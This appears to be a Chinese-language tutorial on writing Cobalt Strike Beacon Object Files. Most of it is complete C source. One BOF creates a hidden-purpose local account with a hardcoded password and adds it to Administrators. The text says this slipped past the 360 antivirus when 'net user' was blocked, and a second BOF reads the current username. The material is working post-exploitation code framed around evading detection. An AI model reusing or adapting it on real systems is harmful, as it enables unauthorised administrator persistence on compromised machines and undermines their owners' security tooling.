CS BOF是什么?
Beacon 对象文件 (BOF) 是一个已编译的 C 程序,按照约定编写,允许其在 Beacon 进程内执行并使用内部 Beacon API。BOF 是一种通过新的利用后功能快速扩展 Beacon 代理的方法。
BOF 的占地面积较小。它们在 Beacon 进程内部运行,并且可以使用进程注入块中的可延展的 c2 配置文件来控制内存。
如何开发BOF?
下段代码是官方给出的代码:
下段代码是官方给出的代码:
#include <windows.h>
#include“beacon.h”
void go(char * args, int alen) {
BeaconPrintf(CALLBACK_OUTPUT, "Hello World: %s", args);
}
这里的beacon.h头文件的下载地址如下:
https://hstechdocs.helpsystems.com/kbfiles/cobaltstrike/attachments/beacon.h
这里可以使用 Visual Studio 进行编译也可以使用MinGW进行编译。
VS编译如下:
cl.exe /c /GS- hello.c /Fo hello.obj
但是这里需要注意一个问题,这样编译的话可能会报错,不包括路径集等等。
这里需要将这几个目录加入到系统变量中,系统变量名为:INCLUDE 参考:
https://blog.csdn.net/weixin_41115751/article/details/89817123
在BOF中我们是可以通过GetProcAddress,LoadLibraryA,GetModuleHandle 来调用我们想要的windows API。
例如我们可以将添加用户的代码放到go函数中。
#include <windows.h>
#include <stdio.h>
#include "bofdefs.h"
#pragma region error_handling
#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr)
BOOL _print_error(char* func, int line, char* msg, HRESULT hr) {
#ifdef BOF
//BeaconPrintf(CALLBACK_ERROR, "(%s at %d): %s 0x%08lx", func, line, msg, hr);
BeaconPrintf(CALLBACK_OUTPUT,"Hello world");
#else
printf("[-] (%s at %d): %s 0x%08lx", func, line, msg, hr);
#endif // BOF
return FALSE;
}
#pragma endregion
typedef DWORD NET_API_STATUS;
DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetUserAdd(LPWSTR, DWORD, PBYTE, PDWORD);
DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetLocalGroupAddMembers(LPCWSTR, LPCWSTR, DWORD, PBYTE, DWORD);
#include <LM.h>
#ifdef BOF
void go(char* buff, int len) {
USER_INFO_1 UserInfo;
DWORD dwLevel = 1;
DWORD dwError = 0;
UserInfo.usri1_name = (TCHAR*)L"test123"; // 账户
UserInfo.usri1_password = (TCHAR*)L"Test@#123"; // 密码
UserInfo.usri1_priv = USER_PRIV_USER;
UserInfo.usri1_home_dir = NULL;
UserInfo.usri1_comment = NULL;
UserInfo.usri1_flags = UF_SCRIPT;
UserInfo.usri1_script_path = NULL;
NET_API_STATUS nStatus;
nStatus = NETAPI32$NetUserAdd(
NULL,
dwLevel,
(LPBYTE)&UserInfo,
&dwError
);
if (nStatus == NERR_Success) {
BeaconPrintf(CALLBACK_OUTPUT, "添加成功", NULL);
}
else {
BeaconPrintf(CALLBACK_OUTPUT, "添加失败 %d", nStatus);
}
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname = UserInfo.usri1_name;
NET_API_STATUS aStatus;
aStatus = NETAPI32$NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
if (aStatus == NERR_Success) {
BeaconPrintf(CALLBACK_OUTPUT, "User has been successfully added to Administrators", NULL);
}
else {
BeaconPrintf(CALLBACK_OUTPUT, "User added to Administrators error ", NULL);
}
}
#else
void main(int argc, char* argv[]) {
}
#endif
如下图使用inline-execute调用即可。
如下图直接使用net user去添加账户:
这里卡住了,来看下win10机器显示。
可以发现是不行的,我们用BOF执行。
可以发现已经添加成功了,360没有任何反应。
态函数
除了直接调用windows API之外,我们也可以使用动态函数来进行解析。
动态函数解析就是将Win32 API的声明和调用变成如下格式:
NETAPI32$NetUserAdd
左边是DLL右边是函数名
环境准备
操作系统:windows10
编译器:VS
这里我们使用的是BOF开发模板是:
https://github.com/securifybv/Visual-Studio-BOF-template
环境搭建
首先从github上下载下来之后,然后放到VS的模板目录。
如下图:
放到这里之后打开VS,可以看到已经有这个模板了。
点击创建。
但是这里创建出来的文件是Source.cpp,也就是C++的文件。
这里我们将这个文件复制出来然后改成C文件。
然后点击生成->批生成
勾选前两个即可。
然后生成即可。
如上图就生成成功了。
入口
其实go函数就是BOF的入口,当你在CS上执行inline-execute命令的时候,就会调用go函数。
所以我们可以将win32相关API写到go函数中。
如下例子获取当前用户名:
#include <windows.h>
#include <stdio.h>
#include "bofdefs.h"
#pragma region error_handling
#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr)
BOOL _print_error(char* func, int line, char* msg, HRESULT hr) {
#ifdef BOF
//BeaconPrintf(CALLBACK_ERROR, "(%s at %d): %s 0x%08lx", func, line, msg, hr);
BeaconPrintf(CALLBACK_OUTPUT, "Hello world");
#else
printf("[-] (%s at %d): %s 0x%08lx", func, line, msg, hr);
#endif // BOF
return FALSE;
}
#pragma endregion
DECLSPEC_IMPORT DWORD WINAPI ADVAPI32$GetUserNameA(LPSTR, LPDWORD);
#include <LM.h>
#ifdef BOF
void go(char* buff, int len) {
char username[1024];
DWORD usernameLength = sizeof username;
ADVAPI32$GetUserNameA(username, &usernameLength);
BeaconPrintf(CALLBACK_OUTPUT, "当前用户名为:%s", username);
}
#else
void main(int argc, char* argv[]) {
}
#endif
